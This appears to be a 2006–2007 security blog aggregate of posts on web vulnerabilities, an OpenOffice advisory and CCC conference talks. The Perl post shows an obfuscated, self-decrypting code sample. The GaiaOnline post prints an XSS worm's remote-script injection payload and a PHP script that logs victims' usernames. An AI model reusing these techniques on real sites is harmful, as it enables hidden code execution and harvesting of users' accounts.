IE7 on Linux

Ever fancied running Internet Explorer 7 (or even earlier versions) on your Linux machine but didn’t find an easy way of doing it – admit it, wine doesn’t work that smoothly – IEs4Linux is the solution for you, check it out, or the complete guide.

From the security perspective this should be a lot safer than running a full-blown Windows machine with IE on it, but you need to still be cautious as this is IE we are talking about :) .

Share

GSM scanner/receiver project

THC has decided to donate 999$ to the GSM scanner/receiver project, these guys have decided to help people build cheap GSM scanners/receivers. It is important to support such projects as people tend to think of GSM (and other cellular protocols as secure) as it is “impossible” to just play with it without spending hundreds of dollars buying GSM receiving equipment.

Share

Trackback SQL injection workaround

As you probably seen, there is a new vulnerability in WordPress that allows attackers to use wp-trackback.php to inject arbitrary SQL statements. An exploit has been also released, which can be used to test your system and of course use it maliciously.

No workaround has been yet to be provided (beside upgrading to 2.0.6), but it appears that doing the following minor change to wp-trackback.php doesn’t harm the functionality while still allowing you to prevent people from hacking your website.

Open wp-trackback.php and comment the following lines, this will prevent anyone from changing the default charset from the “safe” ones to the “unsafe” ones (UTF-7 to name one):

if ($charset)
$charset = strtoupper( trim($charset) );
else
Share

Hiding code inside perl

Many languages allow hiding of the executable code inside the the executable itself in such a way that it won’t be easily seen to the naked eye. Perl is considered “safe” from such things are it is not easy to “encrypt” executed content and the “decrypt” and execute it.

The following will provide a simple method of hiding content from the naked eye, while still making it possible to execute seamlessly.

The method doesn’t make it hard to recover the executed code, nor does it make it hard to detect the presence of such “encrypted” content, however by utilizing the mentioned method you can cause the perl script to become a lot less readable both to man and machine.

The below code will simple execute /usr/bin/whoami and return its content, but I wouldn’t trust it :) – kidding. In any case as the sample show even in such languages where pointers/assembly/code bytes are not easily accessible it is still possible to write code that would “decrypt” prior to being executed.
#!/usr/bin/perl
# Self decrypting and executing code in Perl
# Noam Rathaus – Beyond Security Inc.

use Storable qw(freeze thaw);
use Safe;
use strict;
my $safe = new Safe;
$safe->permit(qw(:default require open close));
local $Storable::Deparse = 1;
local $Storable::Eval = sub { $safe->reval($_[0]) };

my $serialized = “%0e%0d%0e%3b%38%39%3e%0e%0e%0e%02%10%00″. “%a2%71%00%2a%2a%2a%2a%7f%79%6f%2a%79%7e%78%63″. “%69%7e%2a%2d%78%6f%6c%79%2d%31%00%2a%2a%2a%2a”. “%63%6c%2a%22%65%7a%6f%64%2a%4c%43%46%4f%26%2a”. “%2d%25%7f%79%78%25%68%63%64%25%7d%62%65%6b%67″. “%63%2a%76%2d%23%2a%71%00%2a%2a%2a%2a%2a%2a%2a”. “%2a%7d%62%63%66%6f%2a%22%6e%6f%6c%63%64%6f%6e”. “%22%2e%55%2a%37%2a%36%4c%43%46%4f%34%23%23%2a”. “%71%00%2a%2a%2a%2a%2a%2a%2a%2a%2a%2a%2a%2a%7a”. “%78%63%64%7e%2a%2e%55%31%00%2a%2a%2a%2a%2a%2a”. “%2a%2a%77%00%2a%2a%2a%2a%2a%2a%2a%2a%69%66%65″. “%79%6f%2a%4c%43%46%4f%31%00%2a%2a%2a%2a%77%00″. “%77%0a%0a%0a”;

$serialized =~ s/%([\da-fA-F]{2})/chr (hex ($1)^10)/eg;
my $code = thaw($serialized);
$code->();

Share

When the defacement archive is the target of defacement

It appears that because of Christmas season the latest Zone-H.org defacement was not covered in the news.

An incident analysis Ho Ho Ho! Merry Xmas! Santa brought to Zone-H a brand new defacement has been released at Zone-H.org site.
NOTE: Mirror link pointing to defaced Zone-H Forum found on the archive (link here) is not the incident covered by the analysis. Zone-H reports that the incident is not in the Zone-H archive.

This was not the first time when Zone-H had unwanted visitors.

Their own archive lists the following cases:
2002/07/15 by: USG Domain: zone-h.org/en/defacements/onhold OS: SolarisSunOS
2002/03/13 by: 0xff Domain: zone-h.org OS: SolarisSunOS

They are running “Apache/1.3.27 Unix PHP/4.2.3″ nowadays.

What the analysis states is:

The funny part is that the incident happened [yesterday night], exactly when all Zone-H board members where around a table for the x-mas dinner discussing about an hypotethical Zone-H incident and backup policies.

But how did this all continued is worth of reading. The attacker used unpatched Hotmail/MSN Cross Site Scripting Vulnerability (reported in Aug ’06!) to get the Hotmail session cookie of one Zone-H contributor. One of his/her means was unpatched JCE Admin Component for Joomla! vulnerability, in turn (see CVE-2006-6419 for details). The CVSS severity of this issue is 7.0, i.e. High.

Share

XSS Worm strikes GaiaOnline

GaiaOnline is a highly popular web based game, a perfect target for an XSS worm. Exactly what Kyran sets out to do, with a little help from Kuza. I’ll be writing about his worm, why it’s so special, the results he’s collected and the response from GaiaOnline.

Normally when you consider an XSS worm, such as the infamous Samy worm, or lesser known IPB ones the one thing they have in common is how they spread. They abuse a filter flaw to store itself in some permanent storage system such as the users profile or the users sugnature. This worm differs in that it uses only reflective XSS holes.

A reflective XSS hole is one where the input you provided is not permanent but is only printed onto the page because it was one of your input variables, usually via GET or POST, in this case POST.

Back to the worm, Kyran was not interested in causing havoc, this worm is merely an experiment to see how much a non-permanent worm can spread on a site reach of 40% (source). First I’ll give you the logging script used.

log.php:

<head>
<title>Error!</title>
<meta http-equiv="refresh" content="0;url=http://www.gaiaonline.com">
</head>
<?php
// Declares file to log to.
$myFile = "log.txt";
// Set file handler. or end execution if file doesnt exist.
$fh = fopen($myFile, 'a') or die("can't open file");
//Take data sent via POST from start.js and put it in $stringData
$stringData = $_POST["username"];
// Write string to file.
fwrite($fh, $stringData);
// Add a tilde followed by newline to divide each entry.
$stringData = "~n";
fwrite($fh, $stringData);
fclose($fh);

?>

As you can see he only logged the username, as he was not interesting in actually taking control of any accounts. Sadly no timestamp was set by each record, but I’m hedging my bets that next time there will be :p.

Now, onto the more juicy bits, the worm. It’s not long code (you won’t have to wade through something Samy like again). In short it does this:

  1. Create content to replace the page by
  2. Set up an AJAX object
  3. Create the variables used to send a PM (sending the PM to everyone in their friends list)
  4. Send the PM.

Gaia have a feature that if you send your PM to friends@gaia then the PM actually goes to everyone in your friends list, this allowed for an obvious shortcut in coding, but the worm would be perfectly possible without this, it would just require one extra AJAX request and some parsing. The payload of the PM is as follows:

“><script defer xsrc=//gaiaonli.site.com/start.js></script><style> (url changed)
As you can see it just pulls in the script again and again sends the PM to everyone in the friends list. I’ve got a copy of the script here, I have changed the url of log.php and start.js in the code, but otherwise this is what start.js would have looked like.

That’s the worm. It can be argued that it is a persistant attack as it is stored in a PM, but as Kyran said “the XSS is reflective, just the propogation method is persistant. But, that’s just semantics”.

What was logged through this worm? Kyran ran the worm for 3-4 hours (with a central .js file it’s easy to stop the worm) and logged 1500 unique usernames, but not much more can be deduced in terms of growth over time due to the lack of timestamps. Since the passwords weren’t logged we cannot check statistics on those, but I would hazard a guess at the statistic being similair to those of sites like MySpace. Furthermore, the point of this exercise was to see how well a reflective XSS worm can spread on a large site.

Kyran did post the worm (code included) on their forum, but that was quickly taken down by one of their mods. He created a new thread without the code in it, which has stayed up. Here’s Kyrans summary of the second thread “the staff haven’t posted anything. It’s mostly people calling me a terrorist”. As of yet they haven’t contacted him for any details (it is possible the mod who took down the first thread kept a copy of the code in which case there is no need to contact Kyran if all they want to do is patch the hole).

What can be understood from this whole incident? Reflective XSS can viably be used to spread an effective worm and sending variables via POST does not make people any safer. Considering how very common reflective XSS is (34 pages of reflective XSS flaws) this is something web masters really need to start getting to grips with. Furthermore it’s clear that Gaiaonline aren’t ready for users reporting flaws, they don’t know what to do when a flaw is reported and they aren’t too quick at fixing them (at the time of writing the flaw is still up).

Now… what site is next?

Share

OpenOffice issued a WMF/EMF code execution fix

It appears that new OpenOffice.org security update has been released.

Red Hat adivsory is located here (rated as Important):
https://rhn.redhat.com/errata/RHSA-2007-0001.html

And what the RHSA-2007:0001-3 states:

Several integer overflow bugs were found in the OpenOffice.org WMF file
processor. An attacker could create a carefully crafted WMF file that could
cause OpenOffice.org to execute arbitrary code when the file was opened by
a victim. (CVE-2006-5870)

CVE link listed is not accessible yet.
Update: Link to the CVE.

More details available via Bugzilla Bug 217347 (CVE-2006-5870 WMF heap overflow) opened in November. Related OpenOffice Issue 70042 document opened on 2nd Oct is located at www.openoffice.org/issues/show_bug.cgi?id=70042.
Both 1.1.x and 2.x versions are affected and this patch should be obtained.

These vulnerabilities are reported in OpenOffice prior to version 2.1.0.
The previous remarkable ‘OOo’ update was released in June.

It is not known if the critical .DOC issue, CVE-2006-6561 (so-called 12122006-djtest.doc issue) was fixed now. I believe that the answer is No.

Update: StarOffice versions 6, 7 and 8 are affected too. Link to the short advisory of NGSSoftware:
ngssoftware.com/advisories/high-risk-vulnerabilities-in-the-staroffice-suite/

Share

AV Marketing and Babes

we discussed nod32′s marketing with putting “nod32 protects your ass” on babes while playing sports (!!!), now we need to discuss something much more exciting, although less innovative.

bit defender! :)

words are a-wasting, go watch their babes (not just booth-babes) at this gaming show. make sure and not just stare at the babes, but listen to the bit defender song!

note: not work-safe, and may be offensive to some viewers.

http://www.youtube.com/results?search_query=bitdefender

and specifically:
http://www.youtube.com/watch?v=xlfneykgjpi
http://www.youtube.com/watch?v=nlhqknop90c
http://www.youtube.com/watch?v=g-0iqmhilrw
http://www.youtube.com/watch?v=-dhgzwinlry
etc.

now, go and watch the symantec version:
http://www.youtube.com/watch?v=x-unym6qfy8

tell me who rocks more!

:)

gadi evron,
ge@beyondsecurity.com.

Share

CCC: Monochrom, hackers and art

one of the greatest surprises for me at 23c3 was my personal introduction to monochrom (wikipedia page), a group of hacker artists from austria. i know jacob appelbaum.. but i had no idea about the austrian group, or how great they are.

in very simple terms they are artists, very contemporary and very very scene-connected. life hacking, real hacking and any type of hacking, these guys are just l33t. we need to get them a stage one evening at defcon so they can play for us.
as a quick introduction to them, sing along with their rfid song (special for 23c3). i know i did… (although i couldn’t follow their german songs, danke sounded like a lot of fun – yes, i saw you singing fukami!)
http://youtube.com/watch?v=ywg53d8_ivw

for their lecture at 23c3, which is very cool and presents a lot of very interesting art projects heavily relating to hacking (not work safe! porn! could be considered very offensive! pg18, etc.) download the wmv:

ftp://ftp.c3d2.de/congress/23c3/monochrom-t4s3.wmv

some of the projects they discuss include porn, indeed, but others are more interesting. they created an entirely fictional artist (georg paul thomann) and had him represent austria in an international art show (and “save” taiwan when china wanted them out of the show). they showed (both by using 50 real euros and with a mathematical calculation) how many times it would take to blow the several trillian euros in circulation by going to a bank and exchanging to usd and euro again and again, etc.

cool people! rfid!!
gadi evron,
ge@beyondsecurity.com.

Share

CCC: traffic analysis

the amazing steven murdoch did some traffic analysis on tor, trying to detect machines behind the annonymizing network. tor itself seems as secure as it had ever been, see comment below.
“by requesting timestamps from a computer, a remote adversary can find out the precise speed of its system clock. as each clock crystal is slightly different, and varies with temperature, this can act as a fingerprint ofthe computer and its location.”

ftp://ftp.fortunaty.net/video/23c3/wmv/timeskew2-t2s1.wmv
http://events.ccc.de/congress/2006/fahrplan/events/1513.en.html

anyone remember caida’s study on the crystals for detecting machines through nats?
http://www.caida.org/publications/papers/2005/fingerprinting/kohnobroidoclaffy05-devicefingerprinting.pdf

another good lecture on traffic analysis at ccc, which was an introduction by george danezis:
http://events.ccc.de/congress/2006/fahrplan/attachments/1185-danezistaintro.pdf

gadi evron,
ge@beyondsecurity.com.

Share

CCC: Router and Infrastructure Hacking

1. at ccc last week raven alder gave a talk on the subject (router and infrastructure hacking), which was pretty neat!

i figure some of you may enjoy this. i hope the video for her talk becomes available soon.

http://events.ccc.de/congress/2006/fahrplan/attachments/1197-ccc_infrastructure_hacking_12_29_06.ppt

2. there was also a lecture on sflow, by elisa jasinska:
video:
ftp://ftp.fortunaty.net/video/23c3/wmv/sflow-t4s2.wmv
presentation and paper:
http://events.ccc.de/congress/2006/fahrplan/attachments/1229-sflow.pdf
http://events.ccc.de/congress/2006/fahrplan/attachments/1137-sflowpaper.pdf

3. i do wish the talk on how ccc set up their multiple-uplink gige network for the conference was filmed, i call this type of “create an isp in 24 hours”, in a very very hostile and busy environment such as at defcon or ccc “extreme networking”.

they got their own asn for 4 days. set up a hosting farm, surfing, mass wireless, etc. for users, and what-not. discovered a wireless network vulnerability, a router dos with nexthop memory issues, etc.
not to mention having to fight off ddoss non stop, fake aps, thousands of active and abusive users and bgp (i really liked their presentation on ripe’s bgplay – very cool stuff - http://www.ris.ripe.net/bgplay/ ).

3000 end points. 1.6 gigs up, 1.0 gigs down.

their slides are up at:

http://events.ccc.de/congress/2006/fahrplan/attachments/1231-23c3-noc-review.pdf

as mentioned before, ccc itself was very good and a lot of fun, there are many other presentations and videos available for download:

ftp://ftp.fortunaty.net/video/23c3/wmv/
http://events.ccc.de/congress/2006/fahrplan/index.en.html

gadi evron,
ge@beyondsecurity.com.

Share

PDF = Potential Death File?

I suggest you tell your browsers to change how it handles .pdf files so that instead of displaying them in your browser it will download them. Sven Vetsch has written about a flaw found by found by Stefano Di Paola and Giorgio Fedon (who presented this at CCC, link) in which a .pdf file can run arbitrary JavaScript on the site hosting the file. It seems that just host hosting PDFs you are putting your sites users at risk to all the evil doings JavaScript can perform. If you want to find out more about the flaw I suggest you read the afore-linked blog post, or gnucitizen’s take on it (which has a PoC on it). What I am more interested in right now is fixing the issue.

Obviously a plugin upgrade would be nice, but what about between then and now? I’d be happy if we could get a fix out quickly for web masters to apply to their sites but since the part of the url after the hash is never sent the server (which in this case is what holds the malicous code) any server side solution is pretty much impossible.
Oh what a fun start to the new year eh? On a more light hearted note, first person to see a SPAM email using this technique wins a virtual cookie from me.

Share

More CCC Presentations and Videos

other presentations i enjoyed, which i just noticed online:
pdf george danezis, introducing traffic analysis

wmv georg wicherski, automated botnet detection and mitigation

wmv gadi evron, fuzzing in the corporate world (yes, mine)

wmv ilja van sprundel, unusual bugs

pdf ilja van sprundel, unusual bugs

wmv michael steil, inside vmware

more here [mirror]. all mirrors, etc. can be found here. i hope everything becomes available soon.

gadi evron,
ge@beyondsecurity.com.

Share

Getting out of the box : The problem of Babel

(in keeping with my ‘purging’ theme, I’m gonna release old blog posts that I meant to come back and clean up. These are just scattered remnants of long-gone ideas…)

A few years back, I worked for this company that subjected all their employees to ‘out-of-the-box’ training. It was a non-grueling, week-long seminar that was mandatory for all IT disciplines and included team-building exercises, personality inventories, group puzzles, creative-thinking exercises, etc. At the end of the week, we were supposed to be equipped to solve problems in creative ways. It was very lame.

In the beginning, Security groups were way out of the box. In fact, most didn’t even acknowledge the existence of a box. Over the years, they have not only invented the box – they have reverse-houdinied themselves into the box. How did that happen?

1) Security has become increasingly complex.

2) The single human brain can only master a finite amount of information.

3) Niche skills become the norm.

Add all this up and you get what I call “The problem of Babel”. We are creating (have created) a growth-limiting caste system. Instead of building a large Tower which would enhance our view of the landscape and feed our creativity, we have dotted the landscape with disjoint chimneys. The chimney’s rarely touch, have no solid base for high growth, are limited in size and scope, and end up trapping those inside.

And, one more

Peace,

!Dmitry

Share

Take this silt

Happy New Year! It’s 2007 and one of my goals is to do less work and spend more time with my family. I think we all have things on our ‘TODO’ list that, at some point, we have to acknowledge we will never get around to. I keep a folder of interesting snippets that I always intended to come back to. In reviewing my ‘snippet’ list, I see things from 2001 and 2002 that I’m not even close to getting around to. I see applications that I downloaded in 1999 or 2000 that I never got around to breaking or even installing. And, worse, I’ve got other snippets that have been deposited that take precedence over these older snippets. Jeremiah Grossman blogged about something similar on his blog. To cut to the chase, I have some silt from the bottom of my TODO pool that is muddying the water of my brain…I’d like to give it to you. Maybe you’ll find some gold.

Wouldn’t it be cool if you could do a pen-test of a company and have the ability to root their internal machines? I’m talking about the machines that reside inside the network – behind all the DMZes, proxies, firewalls, policy routers, etc. A nice juicy machine sitting in the ripe delta of a virgin network. It’s do-able, but it’ll take a little work. Here are a few examples. (more…)

Share

23C3 (CCC) lectures on Google Video

not too many yet…

http://video.google.com/videosearch?q=23c3

from those available, i’d especially recommend:

23c3 – lawrence lessig – on free, and the differences between culture and code
23c3 – automated exploit detection in binaries (by luis miras)

gadi evron,
ge@beyondsecurity.com.

Share